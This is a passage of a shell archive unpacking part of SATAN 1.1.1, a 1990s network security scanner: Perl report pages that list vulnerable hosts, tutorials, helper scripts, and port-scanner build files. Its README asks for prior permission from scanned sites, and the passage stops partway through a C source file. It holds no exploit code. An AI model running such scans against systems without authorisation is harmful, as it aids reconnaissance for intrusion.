echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_results_domain.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_results_domain.pl'\" $1099 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_results_domain.pl' <<'END_OF_FILE'
X#
X# List all hosts in an internet domain
X#
X($_domain, $_sort_order) = split(/,/, $html_script_args);
X
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title> Host Table - Domain $_domain</title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Table - Domain $_domain</h1>

X<hr>
X
X<h3>

X$domain_severities{$_domain} Vulnerable/$domain_count{$_domain} total.

XVulnerability counts in parentheses.
X</h3>
X
X<H4> Sort hosts by:

X<A HREF="satan_results_domain.pl,$_domain,name,">name</a> |
X<A HREF="satan_results_domain.pl,$_domain,type,">system type</a> |
X<A HREF="satan_results_domain.pl,$_domain,subnet,">subnet</a> |
X<A HREF="satan_results_domain.pl,$_domain,severity,">problem count</a> |
X<A HREF="satan_results_domain.pl,$_domain,severity_type,">problem type</a>
X</H4>
XEOF
X
X@_hosts = split(/\s+/, $all_domains{$_domain});

Xdo "$html_root/reporting/sort_hosts.pl";
Xprint CLIENT $@ if $@;
X
Xprint CLIENT <<EOF;

X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |
X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1099 -ne `wc -c <'satan-1.1.1/html/reporting/satan_results_domain.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_results_domain.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_results_domain.pl'
fi
if test -f 'satan-1.1.1/html/reporting/satan_results_subnet.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_results_subnet.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_results_subnet.pl'\" $1088 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_results_subnet.pl' <<'END_OF_FILE'
X#
X# List all hosts in a subnet
X#
X($_subnet, $_sort_order) = split(/,/, $html_script_args);
X
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title> Host Table - Subnet $_subnet</title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Table - Subnet $_subnet</h1>

X<hr>
X
X<h3>

X$subnet_severities{$_subnet} Vulnerable/$subnet_count{$_subnet} total.

XVulnerability counts in parentheses.
X</h3>
X
X<H4> Sort hosts by:

X<A HREF="satan_results_subnet.pl,$_subnet,name,">name</a> |
X<A HREF="satan_results_subnet.pl,$_subnet,domain,">domain</a> |
X<A HREF="satan_results_subnet.pl,$_subnet,type,">system type</a> |
X<A HREF="satan_results_subnet.pl,$_subnet,severity,">problem count</a> |
X<A HREF="satan_results_subnet.pl,$_subnet,severity_type,">problem type</a>
X</H4>
XEOF
X
X@_hosts = split(/\s/, $all_subnets{$_subnet});

Xdo "$html_root/reporting/sort_hosts.pl";
Xprint CLIENT $@ if $@;
X
Xprint CLIENT <<EOF;

X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |
X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1088 -ne `wc -c <'satan-1.1.1/html/reporting/satan_results_subnet.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_results_subnet.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_results_subnet.pl'
fi
if test -f 'satan-1.1.1/html/reporting/satan_severity_types.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_severity_types.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_severity_types.pl'\" $1045 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_severity_types.pl' <<'END_OF_FILE'
X#
X# Report vulnerability classes
X#
Xsub sort_numeric {
X $severity_type_count{$b} <=> $severity_type_count{$a};

X}
X
Xprint CLIENT <<EOF;

X<HTML>
X<HEAD>
X<title> Vulnerabilities - By Type</title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Vulnerabilities - By Type</H1>
X<hr>
X<h3>Number of hosts per vulnerability type.</h3>
XEOF
X
X&make_severity_info();
X
Xif (sizeof(*severity_type_host_info) > 0) {
X print CLIENT <<EOF;
X<ul>
XEOF
X for (sort sort_numeric keys %severity_type_host_info) {
X ($_type = $_) =~ tr / \//?!/;
X

X print CLIENT <<EOF;
X <li>

X <a href="satan_severity_hosts.pl,$_type,">
X $_ - $severity_type_count{$_} host(s)</a>
XEOF
X }
X print CLIENT <<EOF;
X</ul>

X <strong>Note: hosts may appear in multiple categories. </strong>

XEOF
X} else {
X print CLIENT <<EOF

XNo vulnerability information found.

XEOF
X}
X
Xprint CLIENT <<EOF

X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |
X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1045 -ne `wc -c <'satan-1.1.1/html/reporting/satan_severity_types.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_severity_types.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_severity_types.pl'
fi
if test -f 'satan-1.1.1/html/satan_documentation.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/satan_documentation.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/satan_documentation.pl'\" $1232 characters$
sed "s/^X//" >'satan-1.1.1/html/satan_documentation.pl' <<'END_OF_FILE'
Xprint <<EOF
X<HTML>
X<HEAD>
X<title>SATAN</title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">

X</HEAD>
X<BODY>
X

X<H1><IMG SRC="images/satan.gif"> SATAN Documentation</H1>

X<H2>(Security Administrator Tool for Analyzing Networks)</H2>
X<HR>
X<UL>
X<dt><IMG SRC="dots/blackdot.gif" ALT="*">

X <A HREF="docs/satan_overview.html"><strong>SATAN Overview - Introduction, Concepts and Acknowledgements </strong></A>

X<p>
X<dt><IMG SRC="dots/blackdot.gif" ALT="*">

X <A HREF="tutorials/first_time/learning_to_use.html"><strong> Learning to use SATAN - a Quick Tutorial</strong></A>

X<p>
X<dt><IMG SRC="dots/blackdot.gif" ALT="*">

X <A HREF="$HTML_SERVER/tutorials/vulnerability_tutorials.pl"><strong> Vulnerabilities - a Tutorial</strong></A>

X<p>
X<dt><IMG SRC="dots/blackdot.gif" ALT="*">

X <A HREF="docs/satan_reference.html"><strong>SATAN Reference - Architecture, Configuration and Operation</strong></A>

X<p>
X<dt><IMG SRC="dots/blackdot.gif" ALT="*">

X <A HREF="docs/FAQ.html"><strong> Frequently Asked Questions (SATAN FAQ)</strong></A>

X<p>
X<dt><IMG SRC="dots/blackdot.gif" ALT="*">

X <A HREF="docs/quotes.html"><strong> Quotable quotes about SATAN</strong></A>
X</UL>

X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1232 -ne `wc -c <'satan-1.1.1/html/satan_documentation.pl'`; then
echo shar: \"'satan-1.1.1/html/satan_documentation.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/satan_documentation.pl'
fi
if test -f 'satan-1.1.1/html/tutorials/first_time/learning_to_use.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/tutorials/first_time/learning_to_use.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/tutorials/first_time/learning_to_use.html'\" $1076 characters$
sed "s/^X//" >'satan-1.1.1/html/tutorials/first_time/learning_to_use.html' <<'END_OF_FILE'
X<title>Learning how to use SATAN</title>
X<H1><IMG SRC="../../images/satan.gif"> SATAN Tutorials</H1>
X<H2>(Learning how to use SATAN)</H2>
X<HR>
X<p>
XIt can be very easy to use SATAN for the first time; it's basic
Xcapabilities are very simple to use and to understand. To start
Xusing it, there are only three basic steps to follow:
X<p>
X<OL>
X<li> <A HREF="make.html">
X Making a working copy of the program</a>
X<li> <A HREF="scanning.html">
X Scanning your host or networks</a>
X<li> <A HREF="analyzing.html">
X Analyzing the output</a>
X</OL>
X
X<p>
X<STRONG> Remember - you should run SATAN as "root"!</STRONG> Some
Xof the scanning tests require <I>root</I> privileges to run.
X<p>
XAfter trying it once, you should read through the rest of the
Xdocumentation to learn how to use it to its fullest extent. Reading the
X<A HREF="../../docs/user_interface.html#tricky-implications">
XHints, Further tricky security implications, or Getting The Big Picture (tm)</A>
XWould be a <STRONG>very</STRONG> good idea.
X
X<hr>
X<a href=../../satan_documentation.html> Back to the Documentation TOC</a>
END_OF_FILE
if test 1076 -ne `wc -c <'satan-1.1.1/html/tutorials/first_time/learning_to_use.html'`; then
echo shar: \"'satan-1.1.1/html/tutorials/first_time/learning_to_use.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/tutorials/first_time/learning_to_use.html'
fi
if test -f 'satan-1.1.1/html/tutorials/first_time/make.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/tutorials/first_time/make.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/tutorials/first_time/make.html'\" $806 characters$
sed "s/^X//" >'satan-1.1.1/html/tutorials/first_time/make.html' <<'END_OF_FILE'
X<title>Creating your own copy of SATAN</title>
X<H1><IMG SRC="../../images/satan.gif"> Creating your own copy of SATAN</H1>
X<HR>
X<p>
XThere are only two steps to follow; from your Un*x shell prompt:
X<p>
X<OL>
X<li> First, reconfigure the paths used by the programs by typing
X <I>reconfig</I> in the main SATAN directory.
X<li> Then type <I> make</I>

X</OL>
X
X<p>

XThat should be all that is needed. If you have any problems (remember,
XSATAN is currently only <I>fully</I> supported on SunOS 4.x and IRIX 5.x,
Xalthough this will change by the final release), you should
Xread the full documentation on <A HREF="../../docs/getting_started.html">
Xconfiguration and installation.</a>
X<p>
XYou should now go to <A HREF="scanning.html"> Scanning your host or
Xnetworks</a> to see how to start scanning hosts using SATAN.
END_OF_FILE
if test 806 -ne `wc -c <'satan-1.1.1/html/tutorials/first_time/make.html'`; then
echo shar: \"'satan-1.1.1/html/tutorials/first_time/make.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/tutorials/first_time/make.html'
fi
if test -f 'satan-1.1.1/html/tutorials/vulnerability_tutorials.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/tutorials/vulnerability_tutorials.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/tutorials/vulnerability_tutorials.pl'\" $674 characters$
sed "s/^X//" >'satan-1.1.1/html/tutorials/vulnerability_tutorials.pl' <<'END_OF_FILE'
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title> Tutorials - Security Problems </title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Tutorials - Security problems </h1>
X<hr>
X<h2>Table of contents</h2>
X<ul>
XEOF
X
Xforeach (<$html_root/tutorials/vulnerability/*.html>) {
X s;.*/([^\/]+);\1;;
X ($_tutorial = $_) =~ s;([^\/]+).html;\1;;
X $_tutorial =~ tr /_/ /;
X print CLIENT <<EOF;
X <p><dt> <IMG SRC=$HTML_ROOT/dots/blackdot.gif>
X <a href=$HTML_ROOT/tutorials/vulnerability/$_> <strong>$_tutorial </strong></a>
XEOF

X}
Xprint CLIENT <<EOF;
X</ul>
X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 674 -ne `wc -c <'satan-1.1.1/html/tutorials/vulnerability_tutorials.pl'`; then
echo shar: \"'satan-1.1.1/html/tutorials/vulnerability_tutorials.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/tutorials/vulnerability_tutorials.pl'
fi
if test -f 'satan-1.1.1/perl/getfqdn.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/getfqdn.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/getfqdn.pl'\" $1127 characters$
sed "s/^X//" >'satan-1.1.1/perl/getfqdn.pl' <<'END_OF_FILE'
X#
X# Look up a host name the hard way, using nsloookup. Don't rely on the
X# gethostbyname() library routine, as there are too many broken NIS
X# setups. Return an empty string in case of errors.
X#
X# Stand-alone usage: getfqdn.pl hostname.
X#
X# version 1, Tue Mar 21 19:31:03 1995, last mod by wietse
X#
Xrequire 'config/paths.pl';
Xrequire 'config/satan.cf';
X
Xsub getfqdn {
X local($host) = @_;
X local($result, $temp);
X
X if ($host =~ /^[0-9.]+$/) {
X return $host unless ($temp = &get_host_name($host));
X $host = $temp;
X }
X if ($dont_use_nslookup) {
X return &get_host_name($host);
X }
X
X if (!exists($getfqdn_cache{$host})) {
X open(NSLOOKUP, "$NSLOOKUP 2>/dev/null <<EOF\n$host\nEOF|")
X || die "cannot run $NSLOOKUP: $!";
X $result = "";
X while(<NSLOOKUP>) {
X if (/name:\s+(\S+)/i) {
X ($result = $1) =~ tr /A-Z/a-z/;
X last;
X }
X }
X close(NSLOOKUP);
X $getfqdn_cache{$host} = $result;
X }
X return($getfqdn_cache{$host});

X}
X
X#
X# Some scaffolding code for stand-alone testing.
X#
Xif ($running_under_satan == 0) {

X $running_under_satan = 1;
X require 'perl/get_host.pl';
X $host = &getfqdn($ARGV[0]);
X print "$host\n";
X}
X
X1;
END_OF_FILE
if test 1127 -ne `wc -c <'satan-1.1.1/perl/getfqdn.pl'`; then
echo shar: \"'satan-1.1.1/perl/getfqdn.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/getfqdn.pl'
fi
if test -f 'satan-1.1.1/perllib/getopts.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perllib/getopts.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perllib/getopts.pl'\" $955 characters$
sed "s/^X//" >'satan-1.1.1/perllib/getopts.pl' <<'END_OF_FILE'
X;# getopts.pl - a better getopt.pl
X
X;# Usage:
X;# do Getopts('a:bc'); # -a takes arg. -b & -c not. Sets opt_* as a
X;# # side effect.
X
Xsub Getopts {
X local($argumentative) = @_;
X local(@args,$_,$first,$rest);
X local($errs) = 0;

X local($[) = 0;
X

X @args = split( / */, $argumentative );
X while(@ARGV && ($_ = $ARGV[0]) =~ /^-(.)(.*)/) {
X ($first,$rest) = ($1,$2);
X $pos = index($argumentative,$first);
X if($pos >= $[) {
X if($args[$pos+1] eq ':') {
X shift(@ARGV);
X if($rest eq '') {
X ++$errs unless @ARGV;
X $rest = shift(@ARGV);
X }
X eval "\$opt_$first = \$rest;";
X }
X else {
X eval "\$opt_$first = 1";
X if($rest eq '') {
X shift(@ARGV);
X }
X else {
X $ARGV[0] = "-$rest";

X }
X }
X }
X else {

X print STDERR "Unknown option: $first\n";
X ++$errs;
X if($rest ne '') {
X $ARGV[0] = "-$rest";
X }
X else {
X shift(@ARGV);
X }
X }
X }
X $errs == 0;
X}
X
X1;
END_OF_FILE
if test 955 -ne `wc -c <'satan-1.1.1/perllib/getopts.pl'`; then
echo shar: \"'satan-1.1.1/perllib/getopts.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perllib/getopts.pl'
fi
if test -f 'satan-1.1.1/repent' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/repent'\"
else
echo shar: Extracting \"'satan-1.1.1/repent'\" $1230 characters$
sed "s/^X//" >'satan-1.1.1/repent' <<'END_OF_FILE'
X:
X#
X# Change SATAN to SANTA. Do this *before* you type make...
X#
X# version 1, Fri Mar 24 2:25:29 1995, last mod by zen
X#
X
X# if we see an md5 file, we'll assume they have already done a make...
Xif test -f bin/md5 ; then
X echo Run this before doing a \"make\", or run \"make clean\" and then run it...

X exit 1
X fi
X
X#

X# Change the file names from "*satan*" ==> "*santa*"
Xecho Finding all the file names
Xfind . \! -name "satan*.gif" -print | while read old_name
X do
X new_name=`echo $old_name | sed 's/satan/santa/'`
X if test $new_name != $old_name ; then
X mv $old_name $new_name
X fi
X done
X
X#
X# Nuke the inline and acronym stuff in everything but the binaries...
Xecho Now changing all "SATAN" occurances to "SANTA"... please wait...
Xfind . -type f \! -name "*.gif" -print |
X grep -v see_the_light.pl | xargs \
X perl -pi -e 's/SATAN/SANTA/g; s/satan/santa/g; s/Security Administrator Tool for Analyzing Networks/Security Analysis Network Tool for Administrators/'
X
Xecho linking santa...
Xln html/images/santa.gif html/images/santa-almost-full.gif
Xln html/images/santa.gif html/images/santa-full.gif
X
X#
X# one last switch...
Xperl -pi -e 's/"SANTA"/"SATAN"/; s/you can run the/but you shouldnt have run the/' html/name.html
X
Xecho Done!
END_OF_FILE
if test 1230 -ne `wc -c <'satan-1.1.1/repent'`; then
echo shar: \"'satan-1.1.1/repent'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/repent'
# end of 'satan-1.1.1/repent'
fi
if test -f 'satan-1.1.1/rules/trust' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/rules/trust'\"
else
echo shar: Extracting \"'satan-1.1.1/rules/trust'\" $942 characters$
sed "s/^X//" >'satan-1.1.1/rules/trust' <<'END_OF_FILE'
X#
X# Rules that classify hosts by trust relationship. These are applied to
X# every 'a' SATAN record. Basically, they translate the cryptic SATAN
X# record data to something that is more suitable for reports.

X#
X# Format of this file is:
X#

X# condition TABs relationship

X#
X# The condition is a PERL expression, with full access to the global
X# $target..$text variables.
X#

X# The relationship field specifies a name such as "remote login" or
X# "file sharing".

X#
X# Empty lines and text after a "#" character are ignored. Long lines may
X# be broken with backslash-newline.
X#

X# version 1, Mon Mar 27 9:30:32 1995, last mod by wietse
X#
X
X$severity eq "l" && $trustee =~ /^root@/ root login
X$severity eq "l" && $trustee !~ /^root@/ user login
X$text =~ /exports \S+ to/ NFS export
X$text =~ / mounts \S+/ NFS export
X/serves nis domain/ NIS client
X$trustee =~ /\/export\/root\/(.*)@(.*)/ boot client
X/authoritative DNS host/ domain name service
END_OF_FILE
if test 942 -ne `wc -c <'satan-1.1.1/rules/trust'`; then
echo shar: \"'satan-1.1.1/rules/trust'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/rules/trust'
fi
if test -f 'satan-1.1.1/src/fping/Makefile' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/fping/Makefile'\"
else
echo shar: Extracting \"'satan-1.1.1/src/fping/Makefile'\" $1087 characters$
sed "s/^X//" >'satan-1.1.1/src/fping/Makefile' <<'END_OF_FILE'
X
XPROG= ../../bin/fping
XOBJS= fping.o
XSRC= fping.c
XBIN= /usr/local/bin
XMAN= /usr/man/manl
XMANSRC= fping.man
XMANDST= fping.l
X
X#
X# Interval is the minimum amount of time between sending a ping packet to
X# any host.
X#
X# Timeout is the minimum amount of time between sending a ping packet to
X# a particular host.
X#
X# Retry is the number of ping packets to send to a host before giving up.
X#
X
XDEFAULTS= -DDEFAULT_INTERVAL=25 \
X -DDEFAULT_TIMEOUT=2500 \
X -DDEFAULT_RETRY=3
X#
X# some systems need the following:
X#
X#LIBS= -lsocket
X
XLIBS=
X
Xall: $(PROG)
X
X$(PROG) : $(OBJS)
X $(CC) $(OBJS) -o $(PROG) $(LIBS)
X
X$(OBJS) : $(SRC)
X $(CC) $(CFLAGS) -c $(DEFAULTS) $(SRC)
X
X# if you don't have install type:
X# cp $(PROG) /usr/local/bin
X# chown root /usr/local/bin/$(PROG)
X# chmod 4555 /usr/local/bin/$(PROG)
X# strip /usr/local/bin/$(PROG)
X#
X
Xinstall:
X install -c -m 4555 -o root -s $(PROG) $(BIN)/$(PROG)
X install -c -m 0444 -o root $(MANSRC) $(MAN)/$(MANDST)
X
Xclean:
X rm -f a.out core *~ *.o $(PROG)
X
Xshar:
X shar README CHANGES fping.c fping.man Makefile README.VMS > fping.shar
END_OF_FILE
if test 1087 -ne `wc -c <'satan-1.1.1/src/fping/Makefile'`; then
echo shar: \"'satan-1.1.1/src/fping/Makefile'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/fping/Makefile'
fi
if test -f 'satan-1.1.1/src/misc/global.h' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/misc/global.h'\"
else
echo shar: Extracting \"'satan-1.1.1/src/misc/global.h'\" $837 characters$
sed "s/^X//" >'satan-1.1.1/src/misc/global.h' <<'END_OF_FILE'
X/* GLOBAL.H - RSAREF types and constants
X */
X
X/* PROTOTYPES should be set to one if and only if the compiler supports
X function argument prototyping.
XThe following makes PROTOTYPES default to 0 if it has not already
X been defined with C compiler flags.
X */
X#ifndef PROTOTYPES
X#define PROTOTYPES 0
X#endif
X
X/* POINTER defines a generic pointer type */
Xtypedef unsigned char *POINTER;
X
X/* UINT2 defines a two byte word */
Xtypedef unsigned short int UINT2;
X
X/* UINT4 defines a four byte word */
X#ifdef __alpha
Xtypedef unsigned int UINT4;
X#else
Xtypedef unsigned long int UINT4;
X#endif
X
X/* PROTO_LIST is defined depending on how PROTOTYPES is defined above.
XIf using PROTOTYPES, then PROTO_LIST returns the list, otherwise it
X returns an empty list.
X */
X#if PROTOTYPES
X#define PROTO_LIST(list) list
X#else
X#define PROTO_LIST(list) ()
X#endif
END_OF_FILE
if test 837 -ne `wc -c <'satan-1.1.1/src/misc/global.h'`; then
echo shar: \"'satan-1.1.1/src/misc/global.h'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/misc/global.h'
fi
if test -f 'satan-1.1.1/src/misc/md5.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/misc/md5.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/misc/md5.c'\" $1101 characters$
sed "s/^X//" >'satan-1.1.1/src/misc/md5.c' <<'END_OF_FILE'
X /*
X * md5 - trivial command-line driver for the MD5 hash function.
X *
X * usage: md5 [files...]

X *
X * Author: Wietse Venema.
X */

X#include <stdio.h>

X#include "global.h"
X#include "md5.h"
X

X#define MD5_HASH_LENGTH 16

X
Xmain(argc, argv)
Xint argc;

Xchar **argv;
X{
X char *crunch();
X FILE *fp;
X
X if (argc < 2) {
X printf("%s\n", crunch(stdin));
X } else {
X while (--argc && *++argv) {
X if ((fp = fopen(*argv, "r")) == 0) {
X perror(*argv);
X return (1);
X }
X printf("%s %s\n", crunch(fp), *argv);
X fclose(fp);
X }
X }

X return (0);
X}
X

Xchar *crunch(fp)
XFILE *fp;
X{
X MD5_CTX md;
X unsigned char sum[MD5_HASH_LENGTH];
X unsigned char buf[BUFSIZ];
X static char result[2 * MD5_HASH_LENGTH + 1];
X static char hex[] = "0123456789abcdef";
X int buflen;
X int i;
X
X MD5Init(&md);
X while ((buflen = fread(buf, 1, BUFSIZ, fp)) > 0)
X MD5Update(&md, buf, buflen);
X MD5Final(sum, &md);
X
X for (i = 0; i < MD5_HASH_LENGTH; i++) {
X result[2 * i] = hex[(sum[i] >> 4) & 0xf];
X result[2 * i + 1] = hex[sum[i] & 0xf];
X }
X return (result);
X}
END_OF_FILE
if test 1101 -ne `wc -c <'satan-1.1.1/src/misc/md5.c'`; then
echo shar: \"'satan-1.1.1/src/misc/md5.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/misc/md5.c'
fi
if test -f 'satan-1.1.1/src/misc/md5.h' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/misc/md5.h'\"
else
echo shar: Extracting \"'satan-1.1.1/src/misc/md5.h'\" $1345 characters$
sed "s/^X//" >'satan-1.1.1/src/misc/md5.h' <<'END_OF_FILE'
X/* MD5.H - header file for MD5C.C

X */
X
X/* Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
Xrights reserved.
X
XLicense to copy and use this software is granted provided that it
Xis identified as the "RSA Data Security, Inc. MD5 Message-Digest
XAlgorithm" in all material mentioning or referencing this software
Xor this function.
X
XLicense is also granted to make and use derivative works provided
Xthat such works are identified as "derived from the RSA Data
XSecurity, Inc. MD5 Message-Digest Algorithm" in all material
Xmentioning or referencing the derived work.
X
XRSA Data Security, Inc. makes no representations concerning either
Xthe merchantability of this software or the suitability of this
Xsoftware for any particular purpose. It is provided "as is"
Xwithout express or implied warranty of any kind.
X
XThese notices must be retained in any copies of any part of this
Xdocumentation and/or software.
X */
X

X/* MD5 context. */
Xtypedef struct {
X UINT4 state[4]; /* state (ABCD) */
X UINT4 count[2]; /* number of bits, modulo 2^64 (lsb first) */
X unsigned char buffer[64]; /* input buffer */
X} MD5_CTX;
X
Xvoid MD5Init PROTO_LIST((MD5_CTX *));
Xvoid MD5Update PROTO_LIST((MD5_CTX *, unsigned char *, unsigned int));
Xvoid MD5Final PROTO_LIST((unsigned char [16], MD5_CTX *));
END_OF_FILE
if test 1345 -ne `wc -c <'satan-1.1.1/src/misc/md5.h'`; then
echo shar: \"'satan-1.1.1/src/misc/md5.h'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/misc/md5.h'
fi
if test -f 'satan-1.1.1/src/port_scan/Makefile' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/port_scan/Makefile'\"
else
echo shar: Extracting \"'satan-1.1.1/src/port_scan/Makefile'\" $915 characters$
sed "s/^X//" >'satan-1.1.1/src/port_scan/Makefile' <<'END_OF_FILE'
XSHELL = /bin/sh
XBIN = ../../bin
XTCP_SRC = tcp_scan.c find_addr.c mallocs.c non_blocking.c \
X print_data.c open_limit.c error.c strerror.c
XTCP_OBJ = tcp_scan.o find_addr.o mallocs.o non_blocking.o \
X print_data.o open_limit.o error.o strerror.o
XUDP_SRC = udp_scan.c find_addr.c mallocs.c open_limit.c error.c ring.c \
X strerror.c
XUDP_OBJ = udp_scan.o find_addr.o mallocs.o open_limit.o error.o ring.o \
X strerror.o
XCFLAGS = -O $(XFLAGS)
XFILES = README tcp_scan.1 error.c find_addr.c lib.h makefile mallocs.c \
X non_blocking.c open_limit.c print_data.c tcp_scan.c udp_scan.c ring.c \
X strerror.o
XPROGS = $(BIN)/tcp_scan $(BIN)/udp_scan

X#LIBS = -lsocket -lnsl
X

Xall: $(PROGS)
X
X$(BIN)/tcp_scan: $(TCP_OBJ)
X $(CC) $(CFLAGS) -o $@ $(TCP_OBJ) $(LIBS)
X
X$(BIN)/udp_scan: $(UDP_OBJ)
X $(CC) $(CFLAGS) -o $@ $(UDP_OBJ) $(LIBS)
X
Xshar:
X @shar $(FILES)
X
Xlint:
X lint $(TCP_SRC)
X lint $(UDP_SRC)
X
Xclean:
X rm -f *.o $(PROGS) core
END_OF_FILE
if test 915 -ne `wc -c <'satan-1.1.1/src/port_scan/Makefile'`; then
echo shar: \"'satan-1.1.1/src/port_scan/Makefile'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/port_scan/Makefile'
fi
if test -f 'satan-1.1.1/src/port_scan/README' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/port_scan/README'\"
else
echo shar: Extracting \"'satan-1.1.1/src/port_scan/README'\" $966 characters$
sed "s/^X//" >'satan-1.1.1/src/port_scan/README' <<'END_OF_FILE'
Xtcp_scan and udp_scan are tools to scan a host for available network
Xservices (for example, to see if your packet filter does its job). You
Xcan scan specific services or ranges of ports. In order to speed up
Xthe process, the tools probe a bunch of network ports in parallel.
X
XThe programs work with SunOS 4.1.3, SunOS 5.3 (Solaris 2.3) and
Xprobably with anything that looks like 4.3+ BSD or System V.4.
X
XThere is one catch, though: the programs use raw ICMP sockets, so they
Xneed to be run with root privilege. Raw ICMP sockets are used to work
Xaround common shortcomings in BSD (75-second timeout on a non-blocking
XTCP connect() to an unreachable host) and in SYSV (a connected UDP
Xsocket does not pass delivery errors back to the application).
X
XWarning: these programs will raise lots of alarms on sites that run my
Xtcp wrapper or that do any other kind of network monitoring. Use the
Xprograms only with prior permission from the affected sites.
X
X Wietse Venema
END_OF_FILE
if test 966 -ne `wc -c <'satan-1.1.1/src/port_scan/README'`; then
echo shar: \"'satan-1.1.1/src/port_scan/README'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/port_scan/README'
fi
if test -f 'satan-1.1.1/src/port_scan/find_addr.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/port_scan/find_addr.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/port_scan/find_addr.c'\" $1141 characters$
sed "s/^X//" >'satan-1.1.1/src/port_scan/find_addr.c' <<'END_OF_FILE'
X /*
X * find_addr, find_port - map internet hosts and services to internal form

X *
X * Author: Wietse Venema.
X */
X

X#include <sys/types.h>
X#include <sys/socket.h>
X#include <netinet/in.h>
X#include <arpa/inet.h>
X#include <netdb.h>
X
X#include "lib.h"
X
X/* find_addr - translate numerical or symbolic host name */
X
Xstruct in_addr find_addr(host)
Xchar *host;
X{
X struct in_addr addr;

X struct hostent *hp;
X

X addr.s_addr = inet_addr(host);
X if ((addr.s_addr == -1) || (addr.s_addr == 0)) {
X if ((hp = gethostbyname(host)) == 0)
X error("%s: host not found", host);
X if (hp->h_addrtype != AF_INET)
